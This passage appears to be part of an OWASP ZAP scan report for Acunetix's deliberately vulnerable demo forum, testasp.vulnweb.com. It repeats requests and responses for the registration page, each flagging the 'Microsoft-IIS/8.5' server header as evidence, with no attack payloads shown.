href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3554 |
| Response Body - size: 3,554 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
